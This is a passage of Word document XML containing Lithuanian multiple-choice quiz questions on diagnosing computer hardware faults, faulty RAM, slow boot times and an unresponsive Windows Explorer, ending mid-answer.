    <w:p w14:paraId="1ADBC78E" w14:textId="5ACA536F" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>urie požymiai rodo, kad</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>sugedo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00137AF4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>aparatinė įrang</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0A27D" w14:textId="57288108" w:rsidR="00222B64" w:rsidRPr="005A5C28" w:rsidRDefault="0DCCFC8B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
      <w:r w:rsidR="00222B64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Blankus vaizdas monitoriaus ekrane, spalvotos vertikalios arba horizontalios juostos monitoriaus ekrane, girdimas traškesys kompiuterio viduje, stipriai kaista kompiuteris, greitai išsikrauna kompiuterio akumuliatorius</w:t>
      </w:r>
      <w:r w:rsidR="39C52BF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="39C52BF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>neįsijungia sisteminis blokas</w:t>
      </w:r>
      <w:r w:rsidR="00222B64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B207CA5" w14:textId="77777777" w:rsidR="00CB4559" w:rsidRPr="005A5C28" w:rsidRDefault="0DCCFC8B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="00CB4559" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Nenuskaitomi atminties kietojo disko blokai HDD arba SSD, neveikia monitorius;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FF2BD" w14:textId="6B6D0741" w:rsidR="00CB4559" w:rsidRPr="005A5C28" w:rsidRDefault="0DCCFC8B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="00CB4559" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Perpildytas kietasis diskas HDD arba SSD</w:t>
      </w:r>
      <w:r w:rsidR="5385DF1F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>, n</w:t>
      </w:r>
      <w:r w:rsidR="5385DF1F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>eplanuotas operacinės sistemos paleidimas iš naujo diegiant atnaujinimus;</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444365B" w14:textId="77777777" w:rsidR="00F0758D" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F7DBC8" w14:textId="5D9F504E" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="72750BB8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="49B237D5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urie požymiai rodo, kad sugedo</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="49B237D5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> operatyvinė</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> atmintis</w:t>
      </w:r>
      <w:r w:rsidR="49B237D5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18233CB1" w14:textId="68938FAF" w:rsidR="72750BB8" w:rsidRPr="005A5C28" w:rsidRDefault="72750BB8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>A) Neveikia USB jungtys, neveikia</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>neįsijungia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>kompiuteris;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6910D8" w14:textId="1E78D587" w:rsidR="72750BB8" w:rsidRPr="005A5C28" w:rsidRDefault="72750BB8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="34C28B68" w:rsidRPr="005A5C28">
        <w:t>Stringa</w:t>
      </w:r>
      <w:r w:rsidR="34C28B68" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt"/>
        </w:rPr>
        <w:t xml:space="preserve"> operacinė sistema, juodas monitoriaus ekranas, pasileidžia iš naujo operacinė sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFB014" w14:textId="39B0BF61" w:rsidR="72750BB8" w:rsidRPr="005A5C28" w:rsidRDefault="72750BB8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>C) Neveikia kompiuterio aušinimo sistema, kompiuterio procesorius (CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0787EA6F" w14:textId="77777777" w:rsidR="00F0758D" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:strike/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F15E32" w14:textId="57D72DD3" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="02603718" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kompiuteryje, kuriame</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kiet</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HDD,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sistema </w:t>
      </w:r>
      <w:r w:rsidR="75D0EC40" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pasileidžia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> labai lėtai?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ką reikėtų </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">daryti? </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C13E8" w14:textId="0C744214" w:rsidR="0415F225" w:rsidRPr="005A5C28" w:rsidRDefault="0415F225" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A) Atjungti</w:t>
      </w:r>
      <w:r w:rsidR="0167841D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> operacinės sistemos paleidimo metu automatiškai startuojančias programas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD7637F" w14:textId="40936A2C" w:rsidR="0415F225" w:rsidRPr="005A5C28" w:rsidRDefault="0415F225" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="001F0D75" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">š naujo </w:t>
      </w:r>
      <w:r w:rsidR="001F0D75" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">įdiegti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tvarkykles;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B957E" w14:textId="0A2C0C03" w:rsidR="0415F225" w:rsidRPr="005A5C28" w:rsidRDefault="0415F225" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="008D7A5E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įdiegti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSD</w:t>
      </w:r>
      <w:r w:rsidR="001F6327" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> diską</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DDA21" w14:textId="59A53209" w:rsidR="5FF3C572" w:rsidRPr="005A5C28" w:rsidRDefault="5FF3C572" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707BB8AA" w14:textId="1A2669D8" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Windows oper</w:t>
      </w:r>
      <w:r w:rsidR="0C3237C8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>cinėje sistemoje</w:t>
      </w:r>
      <w:r w:rsidR="00405850" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> meniu nereaguoja į </w:t>
      </w:r>
      <w:r w:rsidR="001C5CCE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>įvesties mygtukų paspaudimus</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>. K</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>aip</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> gali būti sprendžiama</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Explorer vedlio klaida</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF6DF3" w14:textId="2E62C51D" w:rsidR="69303C30" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45"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 xml:space="preserve">A) Reikia atidaryti užduočių tvarkytuvą (Task </w:t>
      </w:r>
      <w:r w:rsidR="73E72C9A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">anager Ctrl+Alt+Del arba Ctrl+Shift+Esc), surasti </w:t>
      </w:r>
      <w:r w:rsidR="3BF28E00" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sąraše</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>vedlį (Windows Explorer), spustelti j</w:t>
      </w:r>
      <w:r w:rsidR="003F006A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
